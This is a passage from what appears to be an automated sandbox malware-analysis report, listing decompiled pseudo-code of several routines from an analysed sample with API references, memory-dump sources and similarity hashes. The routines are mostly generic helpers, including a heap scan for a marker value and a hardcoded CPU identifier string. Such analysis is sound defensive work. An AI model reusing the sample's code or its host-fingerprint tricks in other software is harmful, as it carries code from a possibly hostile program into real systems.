                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Pointer$ReadSizeWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 183897549-0
                                                                                                                                                                                          • Opcode ID: 61eeeb71c44645b68382c47f8ae12c026c82ebbda726db92a6632ee7a7c40c8f
                                                                                                                                                                                          • Instruction ID: 3a5d264a32e2a77ed67d2d347f765ff8c0007fa51bcc32732220dda2359e612f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 61eeeb71c44645b68382c47f8ae12c026c82ebbda726db92a6632ee7a7c40c8f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2541E2327083015BD724EE68DC84B2BB3E5EBC4B14F444A2CF6A4D7280D775DD4987A6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C98D7E Relevance: 7.6, APIs: 5, Instructions: 116COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 98%
                                                                                                                                                                                          			E00C98D7E(WCHAR** __ecx, void* __eflags, WCHAR* _a4) {
				short* _v8;
				WCHAR* _t15;
				signed int _t17;
				signed int _t19;
				WCHAR* _t20;
				signed int _t22;
				WCHAR* _t24;
				signed int _t25;
				WCHAR* _t29;
				WCHAR* _t30;
				WCHAR* _t31;
				signed int _t33;
				WCHAR* _t36;
				signed int _t41;
				void* _t49;
				WCHAR* _t51;
				void* _t54;
				short* _t61;
				WCHAR** _t66;

				_push(__ecx);
				_t66 = __ecx;
				E00C98D5C(__ecx, __eflags);
				_t15 =  *__ecx;
				_t41 =  *_t15 & 0x0000ffff;
				if(0 != _t41) {
					_t61 = _a4;
					_t54 = 0x27;
					_v8 = _t61;
					__eflags = _t54 - _t41;
					if(_t54 != _t41) {
						while(1) {
							_t36 =  *_t66;
							_t17 = E00C98D39( *_t36 & 0x0000ffff);
							__eflags = _t17;
							if(_t17 != 0) {
								break;
							}
							_t20 = CharNextW(_t36);
							 *_t66 = _t20;
							_t22 = _t20 - _t36 >> 1;
							__eflags = _t61 + 2 + _t22 * 2 - _v8 + 0x2000;
							if(_t61 + 2 + _t22 * 2 >= _v8 + 0x2000) {
								goto L24;
							} else {
								__eflags = _t22;
								if(_t22 > 0) {
									do {
										 *_t61 =  *_t36;
										_t61 = _t61 + 2;
										_t36 =  &(_t36[1]);
										_t22 = _t22 - 1;
										__eflags = _t22;
									} while (_t22 != 0);
								}
								__eflags = 0 -  *( *_t66);
								if(0 !=  *( *_t66)) {
									continue;
								} else {
									break;
								}
							}
							goto L22;
						}
						__eflags = 0;
						 *_t61 = 0;
						goto L21;
					} else {
						_t24 = CharNextW(_t15);
						 *_t66 = _t24;
						while(1) {
							__eflags = 0 -  *_t24;
							if(0 ==  *_t24) {
								break;
							}
							_t25 = E00C98AF6(_t66);
							__eflags = _t25;
							if(_t25 != 0) {
								break;
							} else {
								_t29 =  *_t66;
								_t49 = 0x27;
								__eflags = _t49 -  *_t29;
								if(_t49 ==  *_t29) {
									 *_t66 = CharNextW(_t29);
								}
								_t30 =  *_t66;
								_a4 = _t30;
								_t31 = CharNextW(_t30);
								 *_t66 = _t31;
								_t33 = _t31 - _a4 >> 1;
								__eflags = _t61 + 2 + _t33 * 2 - _v8 + 0x2000;
								if(_t61 + 2 + _t33 * 2 >= _v8 + 0x2000) {
									L24:
									_t19 = 0x80020009;
								} else {
									__eflags = _t33;
									if(_t33 > 0) {
										_t51 = _a4;
										do {
											 *_t61 =  *_t51;
											_t61 = _t61 + 2;
											_t51 =  &(_t51[1]);
											_t33 = _t33 - 1;
											__eflags = _t33;
										} while (_t33 != 0);
									}
									_t24 =  *_t66;
									continue;
								}
							}
							goto L22;
						}
						__eflags = 0 -  *( *_t66);
						if(0 ==  *( *_t66)) {
							goto L24;
						} else {
							 *_t61 = 0;
							 *_t66 = CharNextW( *_t66);
							L21:
							_t19 = 0;
							__eflags = 0;
						}
					}
					L22:
				} else {
					_t19 = 0x80020009;
				}
				return _t19;
			}






















                                                                                                                                                                                          0x00c98d81
                                                                                                                                                                                          0x00c98d83
                                                                                                                                                                                          0x00c98d85
                                                                                                                                                                                          0x00c98d8a
                                                                                                                                                                                          0x00c98d8c
                                                                                                                                                                                          0x00c98d94
                                                                                                                                                                                          0x00c98da2
                                                                                                                                                                                          0x00c98da7
                                                                                                                                                                                          0x00c98da8
                                                                                                                                                                                          0x00c98dab
                                                                                                                                                                                          0x00c98dae
                                                                                                                                                                                          0x00c98e2e
                                                                                                                                                                                          0x00c98e2e
                                                                                                                                                                                          0x00c98e36
                                                                                                                                                                                          0x00c98e3b
                                                                                                                                                                                          0x00c98e3d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c98e40
                                                                                                                                                                                          0x00c98e49
                                                                                                                                                                                          0x00c98e4d
                                                                                                                                                                                          0x00c98e59
                                                                                                                                                                                          0x00c98e5b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c98e5d
                                                                                                                                                                                          0x00c98e5d
                                                                                                                                                                                          0x00c98e5f
                                                                                                                                                                                          0x00c98e61
                                                                                                                                                                                          0x00c98e64
                                                                                                                                                                                          0x00c98e68
                                                                                                                                                                                          0x00c98e6a
                                                                                                                                                                                          0x00c98e6b
                                                                                                                                                                                          0x00c98e6b
                                                                                                                                                                                          0x00c98e6b
                                                                                                                                                                                          0x00c98e61
                                                                                                                                                                                          0x00c98e72
                                                                                                                                                                                          0x00c98e75
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c98e75
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c98e5b
                                                                                                                                                                                          0x00c98e77
                                                                                                                                                                                          0x00c98e79
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c98db0
                                                                                                                                                                                          0x00c98db7
                                                                                                                                                                                          0x00c98db9
                                                                                                                                                                                          0x00c98e11
                                                                                                                                                                                          0x00c98e13
                                                                                                                                                                                          0x00c98e16
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c98dbf
                                                                                                                                                                                          0x00c98dc4
                                                                                                                                                                                          0x00c98dc6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c98dc8
                                                                                                                                                                                          0x00c98dc8
                                                                                                                                                                                          0x00c98dcc
                                                                                                                                                                                          0x00c98dcd
                                                                                                                                                                                          0x00c98dd0
                                                                                                                                                                                          0x00c98dd5
                                                                                                                                                                                          0x00c98dd5
                                                                                                                                                                                          0x00c98dd7
                                                                                                                                                                                          0x00c98dda
                                                                                                                                                                                          0x00c98ddd
                                                                                                                                                                                          0x00c98de2
                                                                                                                                                                                          0x00c98ded
                                                                                                                                                                                          0x00c98df3
                                                                                                                                                                                          0x00c98df5
                                                                                                                                                                                          0x00c98e85
                                                                                                                                                                                          0x00c98e85
                                                                                                                                                                                          0x00c98dfb
                                                                                                                                                                                          0x00c98dfb
                                                                                                                                                                                          0x00c98dfd
                                                                                                                                                                                          0x00c98dff
                                                                                                                                                                                          0x00c98e02
                                                                                                                                                                                          0x00c98e05
                                                                                                                                                                                          0x00c98e09
                                                                                                                                                                                          0x00c98e0b
                                                                                                                                                                                          0x00c98e0c
                                                                                                                                                                                          0x00c98e0c
                                                                                                                                                                                          0x00c98e0c
                                                                                                                                                                                          0x00c98e02
                                                                                                                                                                                          0x00c98e0f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c98e0f
                                                                                                                                                                                          0x00c98df5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c98dc6
                                                                                                                                                                                          0x00c98e1c
                                                                                                                                                                                          0x00c98e1f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c98e21
                                                                                                                                                                                          0x00c98e23
                                                                                                                                                                                          0x00c98e2a
                                                                                                                                                                                          0x00c98e7c
                                                                                                                                                                                          0x00c98e7c
                                                                                                                                                                                          0x00c98e7c
                                                                                                                                                                                          0x00c98e7c
                                                                                                                                                                                          0x00c98e1f
                                                                                                                                                                                          0x00c98e7e
                                                                                                                                                                                          0x00c98d96
                                                                                                                                                                                          0x00c98d96
                                                                                                                                                                                          0x00c98d96
                                                                                                                                                                                          0x00c98e82

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharNext
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3213498283-0
                                                                                                                                                                                          • Opcode ID: 461b78cf04cc867e28855a2660f9488fd51a1e2cb2c6381f012d41144b86bca6
                                                                                                                                                                                          • Instruction ID: 2a75a38f706d0152d4a35303dd297c8197d1242d6ffe0831b22e095fbf6a2538
                                                                                                                                                                                          • Opcode Fuzzy Hash: 461b78cf04cc867e28855a2660f9488fd51a1e2cb2c6381f012d41144b86bca6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A31A0352102029FDF24DF38C8A967AB3E5EF6A744B600829E4C2C7294EB30DE95C754
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C89BB0 Relevance: 7.6, APIs: 5, Instructions: 89synchronizationCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 88%
                                                                                                                                                                                          			E00C89BB0() {
				long _v8;
				char _v16;
				intOrPtr _v20;
				long _v24;
				char _v28;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t16;
				long _t19;
				void* _t20;
				void* _t21;
				void** _t25;
				void* _t27;
				void** _t36;
				void** _t43;
				void* _t51;
				signed int _t52;
				void* _t53;

				_push(0xffffffff);
				_push(0xd38a20);
				_push( *[fs:0x0]);
				_t16 =  *0xd64070; // 0x8a9e1774
				_push(_t16 ^ _t52);
				 *[fs:0x0] =  &_v16;
				_v20 = _t53 - 0x10;
				_t36 =  *0xd68dcc; // 0x988bd8
				if(_t36 != 0) {
					_t19 = _t36[1];
					if(_t19 != 0xffffffff) {
						_t20 = TlsGetValue(_t19);
						_v24 = _t20;
						if(_t20 != 0) {
							goto L16;
						} else {
							_t36 =  *0xd68dcc; // 0x988bd8
							goto L6;
						}
					} else {
						_v24 = 0;
						L6:
						_t21 =  *_t36;
						if(_t21 == 0 || WaitForSingleObject(_t21, 0xffffffff) != 0) {
							goto L1;
						} else {
							_v8 = 0;
							_t51 = E00C89CD0(0xd68dcc, 0, _t52);
							_v24 = _t51;
							if(_t51 == 0) {
								_v28 = 1;
								E00D00729( &_v28, 0xd59794);
							}
							_t25 =  *0xd68dcc; // 0x988bd8
							if(E00C89F60(_t25, _t51) == 0) {
								_v32 = 4;
								E00D00729( &_v32, 0xd59794);
							}
							_v8 = 0xffffffff;
							_t43 =  *0xd68dcc; // 0x988bd8
							_t27 =  *_t43;
							if(_t27 != 0) {
								ReleaseMutex(_t27);
							}
							_t20 = _t51;
							L16:
							 *[fs:0x0] = _v16;
							return _t20;
						}
					}
				} else {
					L1:
					 *[fs:0x0] = _v16;
					return 0;
				}
			}























                                                                                                                                                                                          0x00c89bb3
                                                                                                                                                                                          0x00c89bb5
                                                                                                                                                                                          0x00c89bc0
                                                                                                                                                                                          0x00c89bc7
                                                                                                                                                                                          0x00c89bce
                                                                                                                                                                                          0x00c89bd2
                                                                                                                                                                                          0x00c89bd8
                                                                                                                                                                                          0x00c89bdb
                                                                                                                                                                                          0x00c89be5
                                                                                                                                                                                          0x00c89bfb
                                                                                                                                                                                          0x00c89c01
                                                                                                                                                                                          0x00c89c09
                                                                                                                                                                                          0x00c89c0f
                                                                                                                                                                                          0x00c89c14
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c89c1a
                                                                                                                                                                                          0x00c89c1a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c89c1a
                                                                                                                                                                                          0x00c89c03
                                                                                                                                                                                          0x00c89c03
                                                                                                                                                                                          0x00c89c20
                                                                                                                                                                                          0x00c89c20
                                                                                                                                                                                          0x00c89c24
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c89c33
                                                                                                                                                                                          0x00c89c33
                                                                                                                                                                                          0x00c89c40
                                                                                                                                                                                          0x00c89c42
                                                                                                                                                                                          0x00c89c47
                                                                                                                                                                                          0x00c89c49
                                                                                                                                                                                          0x00c89c59
                                                                                                                                                                                          0x00c89c59
                                                                                                                                                                                          0x00c89c60
                                                                                                                                                                                          0x00c89c6c
                                                                                                                                                                                          0x00c89c6e
                                                                                                                                                                                          0x00c89c7e
                                                                                                                                                                                          0x00c89c7e
                                                                                                                                                                                          0x00c89c83
                                                                                                                                                                                          0x00c89ca8
                                                                                                                                                                                          0x00c89cae
                                                                                                                                                                                          0x00c89cb2
                                                                                                                                                                                          0x00c89cb5
                                                                                                                                                                                          0x00c89cb5
                                                                                                                                                                                          0x00c89cbb
                                                                                                                                                                                          0x00c89cbd
                                                                                                                                                                                          0x00c89cc0
                                                                                                                                                                                          0x00c89cce
                                                                                                                                                                                          0x00c89cce
                                                                                                                                                                                          0x00c89c24
                                                                                                                                                                                          0x00c89be7
                                                                                                                                                                                          0x00c89be7
                                                                                                                                                                                          0x00c89bec
                                                                                                                                                                                          0x00c89bfa
                                                                                                                                                                                          0x00c89bfa

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,?,00000000,?,?,00C81043,?), ref: 00C89C29
                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00C89C59
                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00C89C7E
                                                                                                                                                                                          • ReleaseMutex.KERNEL32(00000000), ref: 00C89CB5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Exception@8Throw$MutexObjectReleaseSingleWait
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1745458856-0
                                                                                                                                                                                          • Opcode ID: 6801af37c7132ce72e77b3270cd0107fb948220d3c6724d7535dee0d744163f4
                                                                                                                                                                                          • Instruction ID: e27f37a6fe40085fac3eb437f681e761ae3eff519875bd8c6abad87b179e24cd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6801af37c7132ce72e77b3270cd0107fb948220d3c6724d7535dee0d744163f4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9731D771A047059FCB10EFA9E840A7EF7F8EB48724F24421AE925D33C0D77699008BB4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C89740 Relevance: 7.6, APIs: 5, Instructions: 78memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                          			E00C89740() {
				void* _v4;
				char _v12;
				struct _PROCESS_HEAP_ENTRY _v40;
				void* _v44;
				void* _v48;
				signed int _t25;
				signed char _t34;
				void* _t36;
				void* _t54;
				void* _t57;

				_push(0xffffffff);
				_push(0xd38888);
				_push( *[fs:0x0]);
				_t25 =  *0xd64070; // 0x8a9e1774
				_push(_t25 ^ _t57 - 0x00000024);
				 *[fs:0x0] =  &_v12;
				_v48 = 0;
				_t54 = GetProcessHeap();
				if(_t54 != 0) {
					_v44 = _t54;
					HeapLock(_t54);
					_v4 = 0;
					_v40.lpData = 0;
					while(HeapWalk(_t54,  &_v40) != 0) {
						_t34 = _v40.wFlags;
						if((_t34 & 0x00000033) != 0 || (_t34 & 0x00000004) == 0 || _v40.cbData < 0x10) {
							goto L11;
						} else {
							_t36 = _v40.lpData;
							if( *_t36 != 0x20120919 ||  *((intOrPtr*)(_t36 + 4)) != 0x58781234 ||  *((intOrPtr*)(_t36 + 8)) != 0x10 ||  *((intOrPtr*)(_t36 + 0xc)) == 0) {
								goto L11;
							} else {
								_v48 =  *((intOrPtr*)(_t36 + 0xc));
							}
						}
						goto L14;
						L11:
					}
					L14:
					_v4 = 0xffffffff;
					HeapUnlock(_t54);
					 *[fs:0x0] = _v12;
					return _v48;
				} else {
					 *[fs:0x0] = _v12;
					return 0;
				}
			}













                                                                                                                                                                                          0x00c89740
                                                                                                                                                                                          0x00c89742
                                                                                                                                                                                          0x00c8974d
                                                                                                                                                                                          0x00c89754
                                                                                                                                                                                          0x00c8975b
                                                                                                                                                                                          0x00c89760
                                                                                                                                                                                          0x00c89768
                                                                                                                                                                                          0x00c89772
                                                                                                                                                                                          0x00c89776
                                                                                                                                                                                          0x00c8978e
                                                                                                                                                                                          0x00c89792
                                                                                                                                                                                          0x00c89798
                                                                                                                                                                                          0x00c897a1
                                                                                                                                                                                          0x00c897b0
                                                                                                                                                                                          0x00c897b7
                                                                                                                                                                                          0x00c897bd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c897c9
                                                                                                                                                                                          0x00c897c9
                                                                                                                                                                                          0x00c897d3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c897f7
                                                                                                                                                                                          0x00c897fa
                                                                                                                                                                                          0x00c897fa
                                                                                                                                                                                          0x00c897d3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c897e9
                                                                                                                                                                                          0x00c897f1
                                                                                                                                                                                          0x00c897fe
                                                                                                                                                                                          0x00c897fe
                                                                                                                                                                                          0x00c89807
                                                                                                                                                                                          0x00c89815
                                                                                                                                                                                          0x00c89823
                                                                                                                                                                                          0x00c89778
                                                                                                                                                                                          0x00c8977e
                                                                                                                                                                                          0x00c8978c
                                                                                                                                                                                          0x00c8978c

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(8A9E1774), ref: 00C8976C
                                                                                                                                                                                          • HeapLock.KERNEL32(00000000), ref: 00C89792
                                                                                                                                                                                          • HeapWalk.KERNEL32(00000000,?), ref: 00C897AC
                                                                                                                                                                                          • HeapWalk.KERNEL32(00000000,?), ref: 00C897EF
                                                                                                                                                                                          • HeapUnlock.KERNEL32(00000000), ref: 00C89807
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$Walk$LockProcessUnlock
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2227978497-0
                                                                                                                                                                                          • Opcode ID: 051c19bad8c8c7f219ee7fc0d9a7ce701d34975b4993cb0a0cb59ed475adc6a1
                                                                                                                                                                                          • Instruction ID: d85562cc70ada643e7f378d12cca004f37e459665e1e2e6b92789301280fa94e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 051c19bad8c8c7f219ee7fc0d9a7ce701d34975b4993cb0a0cb59ed475adc6a1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C21E2766183419FC710DF19D884A6BF7E4EF84728F044A2EF8A183260D3749906CFA6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CFF020 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00CFF020(intOrPtr _a4, intOrPtr _a8) {
				char* _t9;
				void* _t15;
				char _t17;
				char _t20;
				void* _t22;
				intOrPtr _t26;
				void* _t28;

				EnterCriticalSection(0xd67c70);
				if( *0xd67bf0 == 0) {
					_t26 = _a4;
					_t22 = E00CFEED0(_t15, _a8, _t26, _a8);
					if(_t22 == 0) {
						L11:
						LeaveCriticalSection(0xd67c70);
						return _t22;
					} else {
						_t9 = 0xd67bf0;
						_t20 = 0x80;
						_t28 = _t26 - 0xd67bf0;
						while(1) {
							_t5 = _t20 + 0x7fffff7e; // 0x7ffffffe
							if(_t5 == 0) {
								break;
							}
							_t17 =  *((intOrPtr*)(_t28 + _t9));
							if(_t17 == 0) {
								break;
							} else {
								 *_t9 = _t17;
								_t9 = _t9 + 1;
								_t20 = _t20 - 1;
								if(_t20 != 0) {
									continue;
								} else {
									 *((char*)(_t9 - 1)) = _t20;
									LeaveCriticalSection(0xd67c70);
									return _t22;
								}
							}
							goto L12;
						}
						if(_t20 == 0) {
							_t9 = _t9 - 1;
						}
						 *_t9 = 0;
						goto L11;
					}
				} else {
					E00C927A0(_a4, _a8, "GenuineIntel:1f8bfbff");
					LeaveCriticalSection(0xd67c70);
					return 1;
				}
				L12:
			}










                                                                                                                                                                                          0x00cff025
                                                                                                                                                                                          0x00cff032
                                                                                                                                                                                          0x00cff05e
                                                                                                                                                                                          0x00cff06a
                                                                                                                                                                                          0x00cff071
                                                                                                                                                                                          0x00cff0b4
                                                                                                                                                                                          0x00cff0b9
                                                                                                                                                                                          0x00cff0c3
                                                                                                                                                                                          0x00cff073
                                                                                                                                                                                          0x00cff073
                                                                                                                                                                                          0x00cff078
                                                                                                                                                                                          0x00cff07d
                                                                                                                                                                                          0x00cff080
                                                                                                                                                                                          0x00cff080
                                                                                                                                                                                          0x00cff088
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cff08a
                                                                                                                                                                                          0x00cff08f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cff091
                                                                                                                                                                                          0x00cff091
                                                                                                                                                                                          0x00cff093
                                                                                                                                                                                          0x00cff094
                                                                                                                                                                                          0x00cff097
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cff099
                                                                                                                                                                                          0x00cff09f
                                                                                                                                                                                          0x00cff0a1
                                                                                                                                                                                          0x00cff0ab
                                                                                                                                                                                          0x00cff0ab
                                                                                                                                                                                          0x00cff097
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cff08f
                                                                                                                                                                                          0x00cff0ae
                                                                                                                                                                                          0x00cff0b0
                                                                                                                                                                                          0x00cff0b0
                                                                                                                                                                                          0x00cff0b1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cff0b1
                                                                                                                                                                                          0x00cff034
                                                                                                                                                                                          0x00cff043
                                                                                                                                                                                          0x00cff04d
                                                                                                                                                                                          0x00cff058
                                                                                                                                                                                          0x00cff058
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00D67C70,00CFF479,?,00001000,?,00000000,00001000), ref: 00CFF025
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00D67C70), ref: 00CFF04D
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00D67C70,?,?), ref: 00CFF0A1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
